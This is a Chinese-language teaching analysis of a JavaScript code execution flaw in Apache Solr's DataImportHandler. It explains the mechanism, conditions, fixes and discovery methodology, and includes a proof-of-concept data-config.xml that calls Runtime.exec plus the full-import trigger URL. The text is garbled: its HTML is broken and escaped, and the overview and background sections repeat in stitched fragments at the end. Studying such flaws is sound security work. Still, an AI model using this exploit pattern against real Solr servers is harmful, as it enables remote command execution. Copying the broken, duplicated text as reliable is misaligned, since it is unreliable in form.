Apache Solr JavaScript 代码执行漏洞分析教学文档<\/h1>

漏洞概述<\/h2>
本教学文档将详细分析Apache Solr中存在的JavaScript代码执行漏洞，从发现者视角剖析漏洞原理、利用条件和修复方案。<\/p>

漏洞背景<\/h2>
Apache Solr是一个基于Lucene的开源搜索平台，提供RESTful API接口。该漏洞存在于Solr的DataImportHandler（DIH）组件中，允许攻击者在特定配置下执行任意JavaScript代码。<\/p>

漏洞原理<\/h2>

DataImportHandler工作机制<\/h3>

DataImportHandler是Solr用于从数据库或其他数据源导入数据的组件，支持以下功能：<\/p>

全量导入：完整导入数据<\/li>
增量导入：仅导入变更数据<\/li>

通过脚本（JavaScript、JRuby等）转换数据<\/li> <\/ul>

漏洞触发点<\/h3>

漏洞存在于脚本转换功能中，具体在：<\/p>

ScriptTransformer<\/code>类处理JavaScript脚本时<\/li>
使用javax.script.ScriptEngine<\/code>执行JavaScript代码<\/li>

未对脚本内容进行安全限制<\/li>
<\/ul>
漏洞利用条件<\/h2>

Solr配置中启用了DataImportHandler<\/li>
数据导入配置中使用了script<\/code>转换器<\/li>
攻击者能够控制数据源或直接修改DIH配置<\/li>
<\/ol>
详细分析<\/h2>
代码执行路径<\/h3>


请求处理流程<\/strong>：<\/p>

请求到达DataImportHandler<\/code><\/li>
解析data-config.xml<\/code>中的脚本配置<\/li>
通过ScriptTransformer<\/code>执行脚本<\/li>
<\/ul>
<\/li>

关键代码<\/strong>：<\/p>
\/\/ ScriptTransformer.java
<\/span><\/span><\/span><\/span>protected<\/span> Object evaluate<\/span>(<\/span>String script,<\/span> Map<<\/span>String,<\/span> Object><\/span> namespace)<\/span> {<\/span>
<\/span><\/span>    ScriptEngine scriptEngine =<\/span> getScriptEngine();<\/span>
<\/span><\/span>    \/\/ 直接将用户输入作为脚本执行
<\/span><\/span><\/span><\/span>    return<\/span> scriptEngine.<\/span>eval<\/span>(<\/span>script,<\/span> new<\/span> SimpleBindings(<\/span>namespace));<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

JavaScript引擎特性<\/strong>：<\/p>

使用Nashorn JavaScript引擎<\/li>
可访问Java类和方法的完整功能<\/li>
无沙箱限制<\/li>
<\/ul>
<\/li>
<\/ol>
攻击向量<\/h3>
攻击者可通过以下方式注入恶意脚本：<\/p>


直接修改data-config.xml<\/strong>：<\/p>
<script><\/span><![CDATA[
<\/span><\/span><\/span>    java.lang.Runtime.getRuntime().exec("恶意命令");
<\/span><\/span><\/span>]]><\/span><\/script><\/span>
<\/span><\/span><\/code><\/pre><\/li>

通过可控数据源注入<\/strong>：<\/p>

如果数据源中的字段值会被作为脚本执行<\/li>
构造包含恶意脚本的数据记录<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞验证<\/h2>
环境搭建<\/h3>

下载存在漏洞的Solr版本（如5.3.0）<\/li>
创建核心并启用DataImportHandler<\/li>
配置包含脚本转换器的data-config.xml<\/li>
<\/ol>
验证步骤<\/h3>


准备恶意配置：<\/p>
<dataConfig><\/span>
<\/span><\/span>  <script><\/span><![CDATA[
<\/span><\/span><\/span>    function attack() {
<\/span><\/span><\/span>      java.lang.Runtime.getRuntime().exec("calc.exe");
<\/span><\/span><\/span>    }
<\/span><\/span><\/span>  ]]><\/span><\/script><\/span>
<\/span><\/span>  <document><\/span>
<\/span><\/span>    <entity<\/span> name=<\/span>"test"<\/span> query=<\/span>"SELECT 1"<\/span>><\/span>
<\/span><\/span>      <field<\/span> column=<\/span>"test"<\/span> script=<\/span>"attack()"<\/span>\/><\/span>
<\/span><\/span>    <\/entity><\/span>
<\/span><\/span>  <\/document><\/span>
<\/span><\/span><\/dataConfig><\/span>
<\/span><\/span><\/code><\/pre><\/li>

触发数据导入：<\/p>
http:\/\/solr-server:8983\/solr\/core-name\/dataimport?command=full-import
<\/code><\/pre>
<\/li>

观察命令执行结果<\/p>
<\/li>
<\/ol>
修复方案<\/h2>
官方修复<\/h3>


限制脚本引擎功能：<\/p>

使用ClassFilter<\/code>限制可访问的Java类<\/li>
禁用危险方法调用<\/li>
<\/ul>
<\/li>

配置建议：<\/p>

禁用不必要的脚本功能<\/li>
严格限制DIH配置修改权限<\/li>
<\/ul>
<\/li>
<\/ol>
临时缓解措施<\/h3>


禁用DataImportHandler：<\/p>
<requestHandler<\/span> name=<\/span>"\/dataimport"<\/span> class=<\/span>"solr.DataImportHandler"<\/span>><\/span>
<\/span><\/span>  <lst<\/span> name=<\/span>"defaults"<\/span>><\/span>
<\/span><\/span>    <str<\/span> name=<\/span>"config"<\/span>><\/span>\/dev\/null<\/str><\/span>
<\/span><\/span>  <\/lst><\/span>
<\/span><\/span><\/requestHandler><\/span>
<\/span><\/span><\/code><\/pre><\/li>

限制网络访问：<\/p>

仅允许可信IP访问管理接口<\/li>
<\/ul>
<\/li>
<\/ol>
深入思考<\/h2>
漏洞发现方法论<\/h3>


功能点分析<\/strong>：<\/p>

识别所有接受外部输入的组件<\/li>
特别关注脚本执行、表达式解析等功能<\/li>
<\/ul>
<\/li>

权限边界检查<\/strong>：<\/p>

验证每个功能的默认权限要求<\/li>
检查是否存在权限绕过可能<\/li>
<\/ul>
<\/li>

数据流追踪<\/strong>：<\/p>

从用户输入点到最终执行点<\/li>
识别所有可能的注入路径<\/li>
<\/ul>
<\/li>
<\/ol>
类似漏洞模式<\/h3>


其他脚本引擎<\/strong>：<\/p>

JRuby、Groovy等脚本引擎的类似问题<\/li>
表达式语言注入（OGNL、SpEL等）<\/li>
<\/ul>
<\/li>

配置注入<\/strong>：<\/p>

XML外部实体注入<\/li>
JSON\/YAML解析问题<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本漏洞展示了在提供强大功能的同时如何引入安全风险。关键教训包括：<\/p>

任何脚本执行功能都需要严格沙箱限制<\/li>
管理接口必须实施强认证和授权<\/li>
默认配置应遵循最小权限原则<\/li>
<\/ol>
通过深入分析此类漏洞，安全研究人员可以培养发现复杂漏洞所需的系统性思维和方法论。<\/p>

Apache Solr JavaScript 代码执行漏洞分析教学文档<\/h1>

漏洞概述<\/h2> 本教学文档将详细分析Apache Solr中存在的JavaScript代码执行漏洞，从发现者视角剖析漏洞原理、利用条件和修复方案。<\/p>

漏洞背景<\/h2> Apache Solr是一个基于Lucene的开源搜索平台，提供RESTful API接口。该漏洞存在于Solr的DataImportHandler（DIH）组件中，允许攻击者在特定配置下执行任意JavaScript代码。<\/p>

漏洞原理<\/h2>

详细分析<\/h2>

漏洞验证<\/h2>

修复方案<\/h2>

深入思考<\/h2>

漏洞概述<\/h2>
本教学文档将详细分析Apache Solr中存在的JavaScript代码执行漏洞，从发现者视角剖析漏洞原理、利用条件和修复方案。<\/p>

漏洞背景<\/h2>
Apache Solr是一个基于Lucene的开源搜索平台，提供RESTful API接口。该漏洞存在于Solr的DataImportHandler（DIH）组件中，允许攻击者在特定配置下执行任意JavaScript代码。<\/p>